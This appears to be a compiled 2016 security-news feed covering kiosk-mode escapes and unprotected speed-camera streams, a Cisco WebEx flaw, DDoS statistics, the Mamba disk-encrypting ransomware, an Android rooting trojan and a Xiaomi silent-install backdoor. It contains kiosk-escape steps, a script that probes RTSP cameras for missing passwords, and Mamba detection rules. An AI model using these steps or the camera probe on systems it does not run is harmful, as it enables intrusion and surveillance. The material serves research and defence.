Self-service check-in kiosks, which can be found at every modern airport, have more or less the same security problems as the terminals described above. It is highly probable that they can be successfully attacked. An important difference between these kiosks and other similar devices is that some terminals at airports handle much more valuable information than terminals elsewhere.

Exiting the kiosk mode by opening an additional browser window

Many airports have a network of computers that provide paid Internet access. These computers handle the personal data that users have to enter to gain access, including people’s full names and payment card numbers. These terminals also have a semblance of a kiosk mode, but, due to design faults, exiting this mode is possible. On the computers we have analyzed, the kiosk software uses the Flash Player to show advertising and at a certain point an attacker can bring up a context menu and use it to access other OS functions.

It is worth noting that web address filtering policies are used on these computers. However, access to policy management on these computers was not restricted, enabling an attacker to add websites to the list or remove them from it, offering a range of possibilities for compromising these devices. For example, the ability to access phishing pages or sites used to distribute malware potentially puts such computers at risk. And blacklisting legitimate sites helps to increase the chances of a user following a phishing link.

List of addresses blocked by policies

We also discovered that configuration information used to connect to the database containing user data is stored openly in a text file. This means that, after finding a way to exit kiosk mode on one of these machines, anyone can get access to administrator credentials and subsequently to the customer database – with all the logins, passwords, payment details, etc.

A configuration file in which administrator logins and password hashes are stored

Infotainment Terminals in Taxicabs

In recent years, Android devices embedded in the back of the front passenger seat have been installed in many taxicabs. Passengers in the back seat can use these devices to watch advertising, weather information, news and jokes that are not really funny. These terminals have cameras installed in them for security reasons.

The application that delivers the content also works in kiosk mode and exiting this mode is also possible.

Exiting the kiosk mode on a device installed in a taxi makes it possible to download external applications

In the terminals that we were able to analyze, there was hidden text on the main screen. It can be selected using standard Android tools via a context menu. This leads to the search option being activated on the main screen. As a result, the shell stops responding, terminates and the device is automatically restarted. While the device is starting, all the hacker needs to do is exit to the main menu at the right time and open RootExplorer, an Android file manager.

Android interface and folder structure

This gives an attacker access to the terminal’s OS and all of its capabilities, including the camera. If the hacker has prepared a malicious application for Android in advance and hosted it on a server, that application can be used to remotely access the camera. In this case, the attacker can remotely control the camera, making videos or taking photos of what is going on in the taxi and uploading them to his server.

Exiting the terminal’s full-screen application in a taxi gives access to the operating system’s functions

Our Recommendations

A successful attack can disrupt a terminal’s operation and cause direct financial damage to its owners. Additionally, a hacker can use a compromised terminal to hack into others, since terminals often form a network. After this, there are extensive possibilities for exploiting the network – from stealing personal data entered by users and spying on them (if the terminal has a camera or document scanner built into it) to stealing money (if the terminal accepts cash or bank cards).

To prevent malicious activity on public devices that have a touch interface, the developers and administrators of terminals located in public places should keep the following recommendations in mind:

The kiosk’s interactive shell should have no extra functions that enable the operating system’s menu to be called (such as right mouse click, links to external sites, etc.)
The application itself should be launched using sandboxing technology, such as jailroot, sandbox, etc. This will help to keep the application’s functionality limited to the artificial environment
Using a thin client is another method of protection. If a hacker manages to ‘kill’ an application, most of the valuable information will be stored on the server rather than the compromised device if the device is a thin client
The current operating system session should be launched with the restricted privileges of a regular user – this will make installing new applications much more difficult
A unique account with a unique password should be created on each device to prevent attackers who have compromised one of the terminals from using the password they have cracked to access other similar devices

Elements of the Road Infrastructure

The road infrastructure of modern cities is being gradually equipped with a variety of intelligent sensors, regulators, traffic analyzers, etc. All these sensors collect and send traffic density information to data centers. We looked at speedcams, which can be found everywhere these days.

Speed Cameras

We found speedcam IP addresses by pure chance, using the Shodan search engine. After studying several of these cameras, we developed a dork (a specific search request that identifies the devices or sites with pinpoint accuracy based on a specific attribute) to find as many IP addresses of these cameras as possible. We noticed a certain regularity in the IP addresses of these devices: in each city, all the cameras were on the same subnet. This enabled us to find those devices which were not shown in Shodan search results but which were on the same subnets as other cameras. This means there is a specific architecture on which these devices are based and there must be many such networks. Next, we scanned these and adjacent subnets for certain open ports and found a large number of such devices.

After determining which ports are open on speed cameras, we checked the hypothesis that one of them is responsible for RTSP – the real-time streaming protocol. The protocol’s architecture enables streaming to be either private (accessible with a login and password) or public. We decided to check that passwords were being used. Imagine our surprise when we realized there was no password and the entire video stream was available to all Internet users. Openly broadcast data includes not only the video stream itself, but additional data, such as the geographical coordinates of cameras, as well.
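The password check described above, as an added example (not Kaspersky's code) for auditing cameras you administer: one RTSP DESCRIBE without credentials is sent and the reply is classified as protected (401 with WWW-Authenticate) or open (200 with an SDP body). Host, port and path are placeholders, and the sample responses are constructed for offline use.

```python
"""RTSP authentication audit for cameras you administer.

Added example, not Kaspersky's code. It sends one DESCRIBE request (what a
video client sends before playing) without credentials and classifies the
reply: 401 plus WWW-Authenticate means the device enforces a password,
200 with an SDP body means the stream description is public. Host, port and
path are placeholders; SAMPLE_RESPONSES are constructed replies for offline use.
"""
import re
import socket
from typing import Dict, List


def classify_rtsp_response(raw: bytes) -> Dict[str, object]:
    """Parse one RTSP response and report whether the endpoint is protected."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    status_line = lines[0].split(" ", 2)
    if len(status_line) < 2 or not status_line[0].startswith("RTSP/"):
        raise ValueError("not an RTSP response: %r" % lines[0])
    status = int(status_line[1])
    headers: Dict[str, List[str]] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    # A device may offer several schemes (Basic and Digest) as separate headers.
    schemes = [v.split(" ", 1)[0] for v in headers.get("www-authenticate", [])]
    content_type = headers.get("content-type", [""])[0].lower()
    if status == 401:
        verdict = "auth_required"
    elif status == 200 and content_type.startswith("application/sdp"):
        verdict = "open"      # stream description handed out without credentials
    else:
        verdict = "other"     # 404 unknown path, 403, 5xx, ...
    return {"status": status, "verdict": verdict, "auth_schemes": schemes,
            "sdp": body.decode("latin-1") if verdict == "open" else ""}


def sdp_media_lines(sdp: str) -> List[str]:
    """Media descriptions ('m=' lines) of an SDP body, i.e. what an open camera reveals."""
    return [line.strip() for line in sdp.splitlines() if line.startswith("m=")]


def audit_stream(host: str, port: int = 554, path: str = "/",
                 timeout: float = 3.0) -> Dict[str, object]:
    """DESCRIBE rtsp://host:port/path with no credentials and classify the reply."""
    url = "rtsp://%s:%d%s" % (host, port, path)
    request = ("DESCRIBE %s RTSP/1.0\r\nCSeq: 1\r\nAccept: application/sdp\r\n"
               "User-Agent: rtsp-audit\r\n\r\n" % url).encode("ascii")
    chunks: List[bytes] = []
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request)
        try:
            while True:
                chunk = sock.recv(65536)
                if not chunk:
                    break
                chunks.append(chunk)
                head, sep, body = b"".join(chunks).partition(b"\r\n\r\n")
                if sep:
                    # Headers are complete; stop once Content-Length bytes of body arrived.
                    m = re.search(rb"(?im)^content-length:\s*(\d+)\s*$", head)
                    if not m or len(body) >= int(m.group(1)):
                        break
        except socket.timeout:
            pass  # classify whatever arrived
    return classify_rtsp_response(b"".join(chunks))


# Constructed replies: a camera enforcing credentials, an open one, a bad path.
SAMPLE_RESPONSES = {
    "protected": (b"RTSP/1.0 401 Unauthorized\r\nCSeq: 1\r\n"
                  b'WWW-Authenticate: Digest realm="cam", nonce="0123abcd"\r\n'
                  b'WWW-Authenticate: Basic realm="cam"\r\n\r\n'),
    "open": (b"RTSP/1.0 200 OK\r\nCSeq: 1\r\nContent-Type: application/sdp\r\n"
             b"Content-Length: 84\r\n\r\n"
             b"v=0\r\no=- 0 0 IN IP4 192.0.2.10\r\ns=speedcam\r\n"
             b"m=video 0 RTP/AVP 96\r\na=control:track1\r\n"),
    "missing": b"RTSP/1.0 404 Not Found\r\nCSeq: 1\r\n\r\n",
}

if __name__ == "__main__":
    for name, raw in SAMPLE_RESPONSES.items():
        print(name, classify_rtsp_response(raw)["verdict"])
```

Run `audit_stream()` only against devices you are responsible for; an "open" verdict on a camera is the finding the recommendations section asks operators to eliminate.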


Direct broadcast screenshot from a speed camera

We found many more open ports on these devices, which can also be used to get many interesting technical details, such as a list of internal subnets used by the camera system or the list of camera hardware.

We learned from the technical documentation that the cameras can be reprogrammed over a wireless channel. We also learned from documentation that cameras can detect rule violations on specified lanes, making it possible to disable detection on one of the lanes in the right place at the right time. All of this can be done remotely.

Let’s put ourselves in criminals’ shoes and assume they need to remain undetected in the car traffic after performing certain illegal actions. They can take advantage of speed camera systems to achieve this. They can disable vehicle detection on some or all lanes along their route or monitor the actions of law-enforcement agents chasing them.

In addition, a criminal can get access to a database of vehicles registered as stolen and can add vehicles to it or remove them from it.

We have notified the organizations responsible for operating speed cameras in those countries where we identified the above security issues.


We also analyzed another element of the road infrastructure – the routers that transfer information between the various smart city elements that are part of the road infrastructure or to data centers.

As we were able to find out, a significant part of these routers uses either weak password protection or none at all. Another widespread vulnerability is that the network name of most routers corresponds to their geographic location, i.e., the street names and building numbers. After getting access to the administration interface of one of these routers, an attacker can scan internal IP ranges to determine other routers’ addresses, thereby collecting information on their locations. After this, by analyzing road load sensors, traffic density information can be collected from these sensors.

Such routers support recording traffic and uploading it to an FTP server that can be created by an attacker. These routers can also be used to create SSH tunnels. They provide access to their firmware (by creating its backup copy), support Telnet connections and have many other capabilities.

These devices are indispensable for the infrastructure of a smart city. However, after gaining access to them, criminals can use them for their own purposes. For example, if a bank uses a secret route to move large amounts of cash, the route can be determined by monitoring information from all sensors (using previously gained access to routers). Next, the movements of the vehicles can be monitored using the cameras.

Our Recommendations

To protect speed cameras, a full-scale security audit and penetration testing must first be carried out. From this, well-thought-out IT security recommendations can be prepared for those who install and maintain such speed monitoring systems. The technical documentation that we were able to obtain does not include any information on security mechanisms that can protect cameras against external attacks. Another thing that needs to be checked is whether such cameras are assigned an external IP address. This should be avoided where possible. For security reasons, none of these cameras should be visible from the Internet.

The main issue with routers used in the road infrastructure is that there is no requirement to set up a password during initial loading and configuration of the device. Many administrators of such routers are too forgetful or lazy to do such simple things. As a result, gaining access to the network’s internal traffic is sufficiently easy.


The number of new devices used in the infrastructure of a modern city is gradually growing. These new devices in turn connect to other devices and systems. For this environment to be safe for people who live in it, smart cities should be treated as information systems whose protection requires a custom approach and expertise.

This article was prepared as part of the support provided by Kaspersky Lab to “Securing Smart Cities”, an international non-profit initiative created to unite experts in smart city IT security technologies. For further information about the initiative, please visit securingsmartcities.org


Cisco releases multiple Security Updates, it fixed a nasty RCE in WebEx Meetings servers
16.9.2016 securityaffairs Vulnerebility

Cisco has released several Security Updates to fix many vulnerabilities in its products, including a nasty RCE in WebEx Meetings servers.
Cisco has issued a patch to address the remote code execution flaw (CVE-2016-1482) that affects the company's WebEx Meetings servers.

The remote code execution flaw (CVE-2016-1482) could be exploited by remote, unauthenticated attackers to execute arbitrary commands on WebEx Meetings servers.

It is crucial for system administrators to apply the patch before attackers exploit the vulnerability against their systems; Cisco highlighted that there is no workaround to mitigate the issue.

“A vulnerability in Cisco WebEx Meetings Server could allow an unauthenticated, remote attacker to bypass security restrictions on a host located in a DMZ and inject arbitrary commands on a targeted system,” Cisco reported in a security advisory.

As explained by the company the vulnerability in WebEx servers is the result of an insufficient sanitization of the user data. The attackers can exploit it to inject arbitrary commands into application scripts and compromise WebEx Meetings servers.

“The vulnerability is due to insufficient sanitization of user-supplied data processed by the affected software. An attacker could exploit this vulnerability by injecting arbitrary commands into existing application scripts running on a targeted device located in a DMZ [and] could allow an attacker to execute arbitrary commands on the device with elevated privileges.”

According to the advisory published by the company, Cisco WebEx Meetings Server version 2.6 is vulnerable to attacks that trigger the flaw.


Cisco also addressed other security issues in its products, including Denial of service flaws that affect Cisco’s Web Security Appliance, WebEx Meetings server, IOS XE software, and carrier routing system.

Another vulnerability affecting the WebEx server, tracked as CVE-2016-1483 and rated as “high,” is the result of improper validation of user accounts by specific services.

“An unauthenticated, remote attacker could exploit this vulnerability by repeatedly attempting to access a specific service, causing the system to perform computationally intensive tasks and resulting in a denial of service attack condition.”

The US-CERT has published a warning of Cisco Releases Security Updates, inviting users to apply the necessary updates.

Below the complete list published by the US-CERT:

Cisco Web Security Appliance HTTP Load Denial of Service Vulnerability cisco-sa-20160914-wsa
Cisco WebEx Meetings Server Denial of Service Vulnerability cisco-sa-20160914-wms
Cisco WebEx Meetings Server Remote Command Execution Vulnerability cisco-sa-20160914-wem
Cisco Unified Computing System Command Line Interface Privilege Escalation Vulnerability cisco-sa-20160914-ucs
Cisco Fog Director for IOx Arbitrary File Write Vulnerability cisco-sa-20160914-ioxfd
Cisco IOS XR for NCS6000 Series Devices OSPF Packet Processing Denial of Service Vulnerability cisco-sa-20160914-iosxr
Cisco IOS and IOS XE Software Data in Motion Denial of Service Vulnerability cisco-sa-20160914-ios-xe
Cisco IOS and IOS XE Software IOx Local Manager Cross-Site Scripting Vulnerability cisco-sa-20160914-ios
Cisco Carrier Routing System IPv6 Denial of Service Vulnerability cisco-sa-20160914-crs
Hurry up, update your system now!

Akamai Q2 2016 report, the number of DDoS attacks has doubled in one year
16.9.2016 securityaffairs Attack

According to the Akamai Q2 2016 report, the number of distributed denial of service attacks has doubled over the last 12 months.
DDoS attacks continue to be a favoured attack vector for crooks: according to the latest report published by Akamai (the Akamai Q2 2016 report), the number of distributed denial of service attacks has doubled over the last 12 months.

In Q2 Akamai experts observed a 129 per cent year-on-year increase in total DDoS attacks; the company mitigated a total of 4,919 attacks in Q2.

One of these DDoS attacks hit a media company and peaked at 363 Gbps, while 10 attacks exceeded 100 Gbps.

A close look at the type of attacks reveals that NTP reflection attacks almost quadrupled, increasing 276 percent over the same time frame.

Companies in the gaming and software industries are privileged targets of hackers that leverage on DDoS as an attack vector.


Another worrisome trend relates to web application attacks, which increased by 14 percent in Q2 2016 over Q1. SQL injection (44 per cent) and Local File Inclusion (45

The Akamai experts observed that retail industry was mostly targeted (40 per cent) with web application attacks in Q2 2016.

The top 10 source countries for DDoS attacks in Q2 2016 are led by China, with a considerable increase in frequency compared with Q1 2016, followed by the US.

“This quarter we saw Turkey end its streak as a top 10 source country for DDoS attacks, a trend that began in Q4 2015. After the US, in second place at 17%, the rest of the top 10 list was populated by countries seldom seen as DDoS sources. Taiwan (5%), Canada (4%), and Vietnam (4%) rounded out the top five. Canada appeared for the first time this quarter.” reads the report.

Below are the key findings of the Akamai Q2 2016 report, enjoy!

DDoS attacks, Q2 2016 vs. Q2 2015

129% increase in total DDoS attacks
151% increase in infrastructure layer (layers 3 & 4) attacks
276% increase in NTP reflection attacks (a record high)
70% increase in UDP flood attacks
DDoS attacks, Q2 2016 vs. Q1 2016

9% increase in total DDoS attacks
10% increase in infrastructure layer (layers 3 & 4) attacks
47% increase in UDP flood attacks
37% decrease in attacks > 100 Gbps: 12 vs.
Web application attacks, Q2 2016 vs. Q1 2016

14% increase in total web application attacks
197% increase in attacks sourcing from Brazil (new top source country)
13% decrease in attacks sourcing from United States (previous top source country)
7% increase in SQLi attacks

Mamba: The new Full Disk Encryption Ransomware Family Member
16.9.2016 securityaffairs Virus

A Brazilian Infosec research group, Morphus Labs, just discovered a new Full Disk Encryption (FDE) Ransomware this week, dubbed Mamba.
Mamba, as they named it, uses a disk-level encryption strategy instead of the conventional file-based one. This may be just the beginning of a new era for ransomware.

In this article, Renato Marinho (@renato_marinho), the researcher responsible for the finding, explains more about this new threat [1].

About Mamba
“You are Hacked ! H.D.D Encrypted, Contact Us For Decryption Key (w889901665@yandex.com) YOURID: 123152”. This message is all that remains for the victims of this new Ransomware. To get the decryption key, it’s necessary to contact somebody through the informed e-mail address, give the ID and pay 1 BTC per infected host. Without that, the system does not even start. For the purposes of this article, we will call this Ransomware “Mamba”, a snake with a paralyzing poison.

It seems that the disk-level Ransomware family is growing. A similar Ransomware, called Petya, became famous in March this year because of its disk encryption strategy, although some analysis [2] says that the malware encrypts the master file table (MFT) and not the data itself. Mamba differs from Petya exactly at this point: it uses an open source full disk encryption tool called DiskCryptor [3] to strongly encrypt the data.

We found Mamba last September 7, during an incident response procedure for a multinational company that had some servers compromised by this malware in its Brazil, USA and India subsidiaries.

The goal of this article is to share some Mamba analysis results and to get some collaboration to better understand this threat and its intrusion vectors.

The ransom message
As stated in the introduction of this article, the ransomware prevents the operating system from booting up. It overwrites the boot disk's master boot record (MBR) with a custom one that shows the ransom message and asks for the password, as you can see in Figure 1.


Figure 1: The ransom message at the beginning of the boot process

It’s not clear, but this new MBR also prompts the user for the decryption password.

Looking for the malware sample
As all the data on the compromised servers' HDDs was encrypted, including the Ransomware itself, we started to look for more information about it somewhere else.

The first strategy was looking for some parts of the ransom message on the Web. To our surprise, searching for the text “contact us for decryption key” YOURID, we received just one result from Google. It pointed to an analysis made using the Malwr [4] sandbox on Aug/29. This result gave us some important information, like the file name (141.exe) and the hashes.


Figure 2: Google results for parts of the ransom message

Searching the “141.exe” file hash at VirusTotal, we found some AV engines linking the sample to a Ransomware malware, like TrendMicro calling it a “Ransom_HDDCRYPTOR.A”.


Figure 3: TrendMicro’s analysis for the “141.exe” sample

At the same time, we started to seek for the malware on other hosts of the company’s network. After some effort, using an anti-malware solution, we started to find a malicious file on several different hosts. The file name was “152.exe”.

Conducting some dynamic analysis of “152.exe” with the TIV and Hybrid-Analysis [5] sandboxes, we started to find some similarities between Mamba’s memory dump strings and the ransom message. To tell the truth, we found exactly the message “You are Hacked ! H.D.D Encrypted, Contact Us For Decryption Key (w889901665@yandex.com) YOURID: 123152” – even the “YOURID” was the same!

By the way, we found it very curious that the “YOURID” information in the sandbox analysis was the same as on the company’s compromised hosts. In other words, it seems like this is a static code.

Mamba’s initial analysis
To better understand how Mamba works, we started to perform some tests with it in our lab. In a first test, we basically ran the sample in a Windows 8.1 VM, but, unfortunately, nothing happened except for a log file in the directory “C:\DC22” saying the password wasn’t provided.

On a second try, we gave a password as a parameter and the result was different. Some other files were created in the “C:\DC22”, as can be seen in the image below.


Figure 4: files created as the result of 152.exe execution with a password argument

After a few seconds, Windows restarted and, when it returned, the operating system was apparently normal. These were the messages found in “log_file.txt”:

installing driver…

installing driver successfully..

getting share drive information…

Trying to create service…

creating service successfully. rebooting windows…

From these messages we got some more information:

– A new service was created – it doesn’t mention the name;

– They are apparently using the tool DiskCryptor;

– Maybe they intend to get some credentials from the machine using “netpass.exe”;

– The “netuse.txt” lists the shared folders mapped by the user;

So, we used Regshot to discover more information about the changes caused by the malware in the OS, including the new service created by the malware. As a result, we discovered that one of the new services was called “DefragmentService”. We also discovered that the malware created a new user on the machine called “mythbusters” with the password “123456”.

These are the new service information:


Figure 5: Fake DefragmentService created by Mamba

So, according to this service, after the machine reboot, “152.exe” was expected to be called with the same parameters we gave in the first run. We kept watching the machine's processes, but no 152.exe was running.

Then, we tried to reboot the machine again to check if the ransom message should appear, but the system booted up normally again.

Performing some analysis on “dcrypt.exe” and “dccon.exe”, the DiskCryptor GUI and command line respectively, we found that the password parameter is preceded by a “-p”. So, we tried running “152.exe” with this parameter before diving into the reverse engineering job.

To our surprise, this time the encryption process worked and the ransom message was shown during boot. The only thing to note here is that the password was the “-p” itself and not the password given by the following parameter as we expected. So, the thing is, Mamba was expecting a second argument to run properly.

The process that encrypted the disk was the “dccon.exe”, called by the “152.exe”. During the process, it was possible to follow the encryption with the command “dccon -info pt0” and the result was like follows:


Figure 6: Full disk encrypted by the Mamba Ransomware.

After the reboot, that didn’t occur automatically, the ransom message was shown exactly the same as the company’s compromised machines.


Figure 7: Lab machine compromised

At this stage, the log file looks like this:

installing driver…

installing driver successfully..

getting share drive information…

Trying to create service…

creating service successfully. rebooting windows…

Checking resources existence. They are OK…

driver installed before…

starting serviceMain…

ServiceMain: Entry

ServiceMain: Performing Service Start Operations

ServiceMain: Waiting for Worker Thread to complete

ServiceWorkerThread: Entry

ServiceCtrlHandler: Entry

ServiceCtrlHandler: Exit

Starting Mount app…

Checking resources existence. They are OK…

driver installed before…

mount:mounting share drive…

mount:OS is win2003 or lower…

mount:share drive not found …

mount:exit Mount…

start hard drive encryption…

Checking resources existence. They are OK…

driver installed before…

Trying to create service…

As we can see, at some moment, the password used to encrypt the disk was printed to the log file.
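The artefacts from the lab run above (the C:\DC22 staging directory, the fake “DefragmentService”, the “mythbusters” account, and dccon.exe being driven by 152.exe) turned into host-hunting rules, as an added example that is not Morphus Labs' code. The event records are constructed to resemble Sysmon/Security-log events exported as dicts; the field names and the password placeholder are assumptions to be mapped onto your own telemetry.

```python
"""Host-level hunting rules for the Mamba artefacts described above.

Added example, not Morphus Labs' code. The rules key on what the article
reports: the C:\\DC22 working directory, the fake "DefragmentService", the
"mythbusters" account, and DiskCryptor's dccon.exe being driven by 152.exe.
The events below are constructed to resemble Sysmon/Security-log records
exported as dicts; the field names are assumptions, map them to your own
telemetry.
"""
import re
from collections import defaultdict
from typing import Dict, Iterable, List

# Staging directory used by the sample (from the analysis above).
DC22_DIR = re.compile(r"^[a-z]:\\dc22(\\|$)", re.IGNORECASE)
# DiskCryptor's GUI and console binaries, named in the analysis.
DISKCRYPTOR_BINARIES = {"dccon.exe", "dcrypt.exe"}
# File names the sample was found under.
DROPPER_NAMES = {"152.exe", "141.exe"}


def _basename(path: str) -> str:
    """Case-folded file name of a Windows path ('C:\\DC22\\dccon.exe' -> 'dccon.exe')."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate_event(ev: Dict[str, str]) -> List[str]:
    """Return the Mamba rule names matched by one event (empty list if none)."""
    hits: List[str] = []
    kind = ev.get("type")
    if kind == "service_installed":
        # The malware registers "DefragmentService" to re-run 152.exe after
        # reboot; any service image under C:\DC22 is just as suspicious.
        if (ev.get("service_name", "").lower() == "defragmentservice"
                or DC22_DIR.search(ev.get("image_path", ""))):
            hits.append("mamba_fake_service")
    elif kind == "user_created":
        if ev.get("target_user", "").lower() == "mythbusters":
            hits.append("mamba_backdoor_account")
    elif kind == "process_created":
        image, parent = ev.get("image", ""), ev.get("parent_image", "")
        if _basename(image) in DISKCRYPTOR_BINARIES and (
                DC22_DIR.search(image) or _basename(parent) in DROPPER_NAMES):
            # Full-disk encryption tool launched from the staging dir or by the dropper.
            hits.append("diskcryptor_driven_by_dropper")
        if _basename(image) in DROPPER_NAMES and DC22_DIR.search(image):
            hits.append("mamba_dropper_executed")
    elif kind == "file_created":
        # log_file.txt, netpass.exe, netuse.txt and the DiskCryptor files land here.
        if DC22_DIR.search(ev.get("target_file", "")):
            hits.append("dc22_staging_write")
    return hits


def hunt(events: Iterable[Dict[str, str]]) -> Dict[str, Dict[str, object]]:
    """Aggregate rule hits per host and decide whether Mamba is suspected.

    A lone staging-directory write could be a false positive, so a host is
    flagged only when two or more distinct rules fire.
    """
    per_host: Dict[str, set] = defaultdict(set)
    for ev in events:
        per_host[ev.get("host", "?")].update(evaluate_event(ev))
    report: Dict[str, Dict[str, object]] = {}
    for host, rules in per_host.items():
        verdict = "mamba_suspected" if len(rules) >= 2 else "clean"
        report[host] = {"rules": sorted(rules), "verdict": verdict}
    return report


# Constructed sample telemetry: one host showing the chain from the article,
# one host with benign look-alikes (Windows' own defrag and Spooler service).
SAMPLE_EVENTS = [
    {"host": "srv-01", "type": "file_created", "target_file": r"C:\DC22\log_file.txt"},
    {"host": "srv-01", "type": "service_installed", "service_name": "DefragmentService",
     "image_path": r"C:\DC22\152.exe -p <password>"},  # <password> is a placeholder
    {"host": "srv-01", "type": "user_created", "target_user": "mythbusters"},
    {"host": "srv-01", "type": "process_created", "image": r"C:\DC22\dccon.exe",
     "parent_image": r"C:\DC22\152.exe", "command_line": "dccon.exe -p <password>"},
    {"host": "ws-02", "type": "service_installed", "service_name": "Spooler",
     "image_path": r"C:\Windows\System32\spoolsv.exe"},
    {"host": "ws-02", "type": "process_created", "image": r"C:\Windows\System32\defrag.exe",
     "parent_image": r"C:\Windows\System32\svchost.exe", "command_line": "defrag C: /O"},
    {"host": "ws-02", "type": "user_created", "target_user": "jdoe"},
]

if __name__ == "__main__":
    for host, result in hunt(SAMPLE_EVENTS).items():
        print(host, result["verdict"], result["rules"])
```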

Next steps
We’ve found some good information about this threat so far, but we haven't found the infection vector yet. We know that the password used to encrypt the disk is given as a parameter, so there may exist some script or other binary that calls the “152.exe” code, giving it the clear-text password that will be used. We also think that the password is the same for all the victims, or may be something related to the victims’ environment, like the hostname.

The actors in charge of this campaign seem to be making some money. We contacted the e-mail address and they asked for 1 BTC per infected machine.

This is the reply message we received:

andy saolis<w889901665@yandex.com>

Your HDD Encrypted By AES 2048Bit

send 1BTC Per HOST to My Bitcoin Wallet , then we give you Decryption key For Your Server HDD!!

My Bitcoin Wallet Address : 1NLnMNMPbxWeMJVtGuobnzWU3WozYz86Bf

We Only Accept Bitcoin , it’s So easy!

you can use Brokers to exchange your money to BTC ASAP

it’s Fast way!

if You Don’t Have a Account in Bitcoin , Read it First :

bitcoin Market :

One point that caught our attention was the mention of “server” in the reply message. Would their strategy be to compromise just servers? Corroborating that hypothesis is the fact that the other machines with the “152.exe” file weren’t compromised.

The bitcoin wallet given by the cybercriminal received 4 BTC by the time of this writing.


Figure 8: Cybercriminal bitcoin wallet balance

As Renato Marinho has stated, Morphus Labs is open to collaborate with the information security community finding more information about this threat. They have other samples of Mamba.

Rooting Pokémons in Google Play Store
16.9.2016 Kaspersky Android
A few days ago we reported to Google the existence of a new malicious app in the Google Play Store. The Trojan presented itself as the “Guide for Pokémon Go”. According to the Google Play Store it has been downloaded more than 500,000 times. Our data suggests there have been at least 6,000 successful infections, including in Russia, India and Indonesia. However, since the app is oriented towards English-speaking users, people in such geographies, and more, are also likely to have been hit.

Analysis reveals that the app contains a malicious piece of code that downloads rooting malware – malware capable of gaining access to the core Android operating system, in this case for the purposes of unsolicited app install and adware.

Kaspersky Lab products detect the Trojan as HEUR:Trojan.AndroidOS.Ztorg.ad.

At least one other version of this particular app was available through Google Play in July 2016. Further, we have tracked back at least nine other apps infected with this Trojan and available on Google Play Store at different times since December 2015.

Trojan characteristics

The Trojan has many layers of defense in place to help it bypass detection. This includes a commercial packer that decrypts the original executable file to make it harder to analyze. The unpacked executable file contains useful code related to the malicious Pokémon Go guide, and one small and obfuscated module.

Process of infection

This small module doesn’t start when the user launches the app. Instead, it waits for the user to install or uninstall another app, then checks to see if that app runs on a real device or on a virtual machine. If it turns out that it’s dealing with a device, the Trojan will wait for a further two hours before starting its malicious activity.

The first thing it does is connect to its command-and-control (CnC) server and upload data about the device, including country, language, device model and OS version.

If the server wants the Trojan to continue it will respond with an ID string. Only if the Trojan receives this ID string will it make its next request to the CnC. If it doesn’t receive anything, it will wait for two hours and then resubmit the first request. This feature is included so that the control server can stop the attack from proceeding if it wants to – skipping those users it does not wish to target, or those which it suspects are a sandbox/virtual machine, for example. Among other things, this provides an additional layer of protection for the malware.

Upon receiving the second request, the CnC server will send the Trojan a JSON file containing a URL. The Trojan downloads file from the specified URL, decrypts it and executes. In our case the Trojan downloaded a file detected as HEUR:Trojan.AndroidOS.Ztorg.a. This file is obfuscated too.

After execution, the Trojan will drop and download some more files. All downloaded files are encrypted and most of them are local root exploit packs for vulnerabilities dating from 2012 to 2015, including one that was previously used by Hacking Team.

These other files represent additional modules of the Trojan and are detected by Kaspersky Lab as:

HEUR:Backdoor.AndroidOS.Ztorg.c, HEUR:Trojan.AndroidOS.Muetan.b, HEUR:Trojan.AndroidOS.Ztorg.ad, HEUR:Backdoor.AndroidOS.Ztorg.h, HEUR:Backdoor.AndroidOS.Ztorg.j, HEUR:Trojan-Dropper.AndroidOS.Agent.cv, HEUR:Trojan.AndroidOS.Hiddad.c. And a few clean tools like busybox and chattr.

Using these exploit packs the Trojan will gain root access rights to the device. After gaining root access, the Trojan will install its modules into the system folders, silently installing and uninstalling other apps and displaying unsolicited ads to the user.

Most of the other apps with this Trojan module available in Google Play had about 10,000 downloads (according to Google Play), but one – “Digital Clock” had more than 100,000 downloads.

Xiaomi Can Silently Install Any App On Your Android Phone Using A Backdoor
15.9.2016 thehackernews Vulnerebility
Do you own an Android Smartphone from Xiaomi, HTC, Samsung, or OnePlus?
If yes, then you must be aware that almost all smartphone manufacturers provide custom ROMs like CyanogenMod, Paranoid Android, MIUI and others with some pre-loaded themes and applications to increase the device's performance.
But do you have any idea about the pre-installed apps and services your manufacturer has installed on your device? What are their purposes? And do they pose any threat to your security or privacy?
With the same curiosity to find answers to these questions, a Computer Science student and security enthusiast from the Netherlands who owns a Xiaomi Mi4 smartphone started an investigation into the purpose of a mysterious pre-installed app, dubbed AnalyticsCore.apk, that runs 24x7 in the background and reappears even if you delete it.
Xiaomi is one of the world's largest smartphone manufacturers, which has previously been criticized for spreading malware, shipping handsets with pre-loaded spyware/adware and forked version of Android OS, and secretly stealing users' data from the device without their permission.
Xiaomi Can Silently Install Any App On your Device
After asking about the purpose of the AnalyticsCore app on the company’s support forum and getting no response, Thijs Broenink reverse engineered the code and found that the app checks for a new update from the company's official server every 24 hours.
While making these requests, the app sends device identification information with it, including phone's IMEI, Model, MAC address, Nonce, Package name as well as signature.
If there is an updated app available on the server with the filename "Analytics.apk," it will automatically get downloaded and installed in the background without user interaction.
"I couldn't find any proof inside the Analytics app itself, so I am guessing that a higher privileged Xiaomi app runs the installation in the background," Broenink says in his blog post.
Now the question is: does your phone verify the correctness of the APK, and does it make sure that it is actually an Analytics app?
Broenink found that there is no validation at all of which APK gets installed on the user's phone, which means there is a way for hackers to exploit this loophole.
This also means Xiaomi can remotely and silently install any application on your device just by renaming it to "Analytics.apk" and hosting it on the server.
"So it looks like Xiaomi can replace any (signed?) package they want silently on your device within 24 hours. And I’m not sure when this App Installer gets called, but I wonder if it’s possible to place your own Analytics.apk inside the correct dir, and wait for it to get installed," Broenink said.
Hackers Can Also Exploit This Backdoor
Since the researcher didn't find the actual purpose of the AnalyticsCore app, neither on Googling nor on the company's website, it is hard to say why Xiaomi has kept this mysterious "backdoor" on its millions of devices.
As I previously said: There is no such backdoor that only its creator can access.
So, what if hackers or any intelligence agency figure out how to exploit this backdoor to silently push malware onto millions of Xiaomi devices within just 24 hours?
Ironically, the device connects and receives updates over an HTTP connection, exposing the whole process to man-in-the-middle attacks.
